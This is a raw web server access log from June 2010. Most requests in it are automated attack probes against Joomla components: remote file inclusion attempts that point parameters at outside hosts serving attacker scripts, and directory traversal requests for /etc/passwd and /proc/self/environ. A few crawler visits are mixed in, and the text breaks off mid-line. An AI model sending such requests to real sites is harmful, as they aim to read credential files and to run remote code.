195.20.196.20 - - [27/Jun/2010:15:57:52 -0500] "GET /logs/access_log.1274572800%20%20/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 323 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:15:59:59 -0500] "GET /logs/access_log.1275868800/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:15:59:59 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:15:59:59 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 11106 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:16:00:30 -0500] "GET /logs/access_log.1275609600/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:16:01:38 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:16:01:38 -0500] "GET /logs/access_log.1274832000/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:16:01:38 -0500] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Casper Bot Search"
67.195.112.180 - - [27/Jun/2010:16:02:01 -0500] "GET /logs/access_log.1274054400 HTTP/1.0" 200 663666 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [27/Jun/2010:16:04:50 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.198.130.7 - - [27/Jun/2010:16:05:31 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:16:05:31 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 11106 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:16:05:31 -0500] "GET /logs/access_log.1276732800/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Casper Bot Search"
81.208.101.202 - - [27/Jun/2010:16:07:46 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
81.208.101.202 - - [27/Jun/2010:16:07:46 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
81.208.101.202 - - [27/Jun/2010:16:07:47 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
64.150.180.136 - - [27/Jun/2010:16:10:37 -0500] "GET /?option=com_properties&controller=/../../../../../../../../etc/passwd HTTP/1.1" 200 1003 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
64.150.180.136 - - [27/Jun/2010:16:10:37 -0500] "GET /logs/?option=com_properties&controller=/../../../../../../../../etc/passwd HTTP/1.1" 200 11106 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
189.108.172.26 - - [27/Jun/2010:16:11:04 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
189.108.172.26 - - [27/Jun/2010:16:11:38 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
218.150.85.170 - - [27/Jun/2010:16:11:41 -0500] "GET /logs/access_log.1276128000//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:16:11:42 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:16:11:42 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:16:11:43 -0500] "GET /logs/access_log.1276473600//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:16:12:00 -0500] "GET /logs/access_log.1276646400//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:16:12:00 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:16:12:01 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:16:12:06 -0500] "GET /logs/access_log.1276732800//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:16:12:06 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
64.150.180.136 - - [27/Jun/2010:16:12:08 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
189.108.172.26 - - [27/Jun/2010:16:12:12 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
218.150.85.170 - - [27/Jun/2010:16:12:18 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:16:12:24 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:16:12:25 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:16:12:44 -0500] "GET /logs/access_log.1276732800//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:16:12:45 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:16:12:45 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.825"
207.46.199.179 - - [27/Jun/2010:16:12:53 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
195.20.196.20 - - [27/Jun/2010:16:13:14 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:16:13:14 -0500] "GET /logs/access_log.1276732800/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:16:13:14 -0500] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:16:13:23 -0500] "GET /logs/access_log.1274400000/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Casper Bot Search"
218.150.85.170 - - [27/Jun/2010:16:14:04 -0500] "GET /logs/access_log.1274832000//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:16:14:05 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:16:14:05 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.825"
91.198.130.7 - - [27/Jun/2010:16:14:56 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:16:14:56 -0500] "GET /logs/access_log.1276214400/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:16:14:56 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 11106 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:16:15:01 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:16:15:01 -0500] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:16:15:01 -0500] "GET /logs/access_log.1274832000%20%20/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 323 "-""Casper Bot Search"
218.150.85.170 - - [27/Jun/2010:16:15:12 -0500] "GET /logs/access_log.1276473600//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.825"
195.20.196.20 - - [27/Jun/2010:16:17:01 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:16:17:01 -0500] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:16:17:01 -0500] "GET /logs/access_log.1274832000/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:16:17:23 -0500] "GET /logs/access_log.1276214400/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Casper Bot Search"
189.108.172.26 - - [27/Jun/2010:16:17:57 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
189.108.172.26 - - [27/Jun/2010:16:18:01 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
189.108.172.26 - - [27/Jun/2010:16:18:03 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
91.198.130.7 - - [27/Jun/2010:16:18:37 -0500] "GET /logs/access_log.1276732800/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:16:18:37 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:16:18:37 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 11106 "-""Casper Bot Search"
218.150.85.170 - - [27/Jun/2010:16:19:29 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:16:19:32 -0500] "GET /logs/access_log.1274572800//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:16:19:33 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:16:19:33 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:16:19:49 -0500] "GET /logs/access_log.1274572800//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:16:19:49 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:16:19:50 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:16:19:56 -0500] "GET /logs/access_log.1275004800//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:16:20:26 -0500] "GET /logs/access_log.1276732800//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:16:20:26 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:16:20:26 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:16:21:44 -0500] "GET /logs/access_log.1276819200//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.825"
96.9.174.8 - - [27/Jun/2010:16:21:52 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
96.9.174.8 - - [27/Jun/2010:16:21:52 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
189.108.172.26 - - [27/Jun/2010:16:22:05 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
189.108.172.26 - - [27/Jun/2010:16:22:10 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
189.108.172.26 - - [27/Jun/2010:16:22:12 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
74.53.202.146 - - [27/Jun/2010:16:22:20 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
74.53.202.146 - - [27/Jun/2010:16:22:21 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
77.79.246.80 - - [27/Jun/2010:16:23:10 -0500] "GET //index1.php?choix=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.808"
66.246.72.50 - - [27/Jun/2010:16:23:43 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
66.246.72.50 - - [27/Jun/2010:16:23:56 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
64.150.180.136 - - [27/Jun/2010:16:25:24 -0500] "GET /logs/access_log.1276473600//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
64.150.180.136 - - [27/Jun/2010:16:25:24 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
64.150.180.136 - - [27/Jun/2010:16:25:25 -0500] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
189.108.172.26 - - [27/Jun/2010:16:26:01 -0500] "GET /logs/access_log.1276732800/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
74.53.202.146 - - [27/Jun/2010:16:26:41 -0500] "GET /logs/access_log.1274832000/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
74.53.202.146 - - [27/Jun/2010:16:26:41 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
74.53.202.146 - - [27/Jun/2010:16:26:41 -0500] "GET /logs/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
96.9.174.8 - - [27/Jun/2010:16:26:42 -0500] "GET /logs/access_log.1274832000/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.823"
96.9.174.8 - - [27/Jun/2010:16:26:42 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
96.9.174.8 - - [27/Jun/2010:16:26:42 -0500] "GET /logs/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.823"
96.9.174.8 - - [27/Jun/2010:16:26:50 -0500] "GET /logs/access_log.1274832000/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.823"
96.9.174.8 - - [27/Jun/2010:16:26:50 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
96.9.174.8 - - [27/Jun/2010:16:26:50 -0500] "GET /logs/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.823"
74.53.202.146 - - [27/Jun/2010:16:26:52 -0500] "GET /logs/access_log.1274832000/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
74.53.202.146 - - [27/Jun/2010:16:26:52 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
74.53.202.146 - - [27/Jun/2010:16:26:52 -0500] "GET /logs/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
207.46.199.52 - - [27/Jun/2010:16:27:09 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.52 - - [27/Jun/2010:16:28:11 -0500] "GET /logs/access_log.1248307200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.246.72.50 - - [27/Jun/2010:16:28:41 -0500] "GET /logs/access_log.1274832000/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
66.246.72.50 - - [27/Jun/2010:16:28:41 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
66.246.72.50 - - [27/Jun/2010:16:28:41 -0500] "GET /logs/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
66.246.72.50 - - [27/Jun/2010:16:28:42 -0500] "GET /logs/access_log.1274832000/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
66.246.72.50 - - [27/Jun/2010:16:28:42 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
66.246.72.50 - - [27/Jun/2010:16:28:42 -0500] "GET /logs/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
189.108.172.26 - - [27/Jun/2010:16:28:53 -0500] "GET /logs/access_log.1276732800/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
189.108.172.26 - - [27/Jun/2010:16:30:21 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
189.108.172.26 - - [27/Jun/2010:16:30:22 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
208.115.111.248 - - [27/Jun/2010:16:30:25 -0500] "GET /artwork/flagart.htm HTTP/1.1" 200 923 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
189.108.172.26 - - [27/Jun/2010:16:30:26 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
208.115.111.248 - - [27/Jun/2010:16:30:27 -0500] "GET /artwork/furniture-misc.htm HTTP/1.1" 200 1977 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [27/Jun/2010:16:30:29 -0500] "GET /artwork/llpostcards.htm HTTP/1.1" 200 1147 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [27/Jun/2010:16:30:31 -0500] "GET /artwork/txt.htm HTTP/1.1" 200 3880 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [27/Jun/2010:16:30:33 -0500] "GET /logs/access_log.1211673600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [27/Jun/2010:16:30:35 -0500] "GET /logs/access_log.1211760000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [27/Jun/2010:16:30:42 -0500] "GET /logs/access_log.1211846400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [27/Jun/2010:16:30:44 -0500] "GET /logs/access_log.1211932800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [27/Jun/2010:16:30:46 -0500] "GET /logs/access_log.1212105600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [27/Jun/2010:16:30:49 -0500] "GET /logs/access_log.1212192000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [27/Jun/2010:16:30:51 -0500] "GET /logs/access_log.1212278400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, cr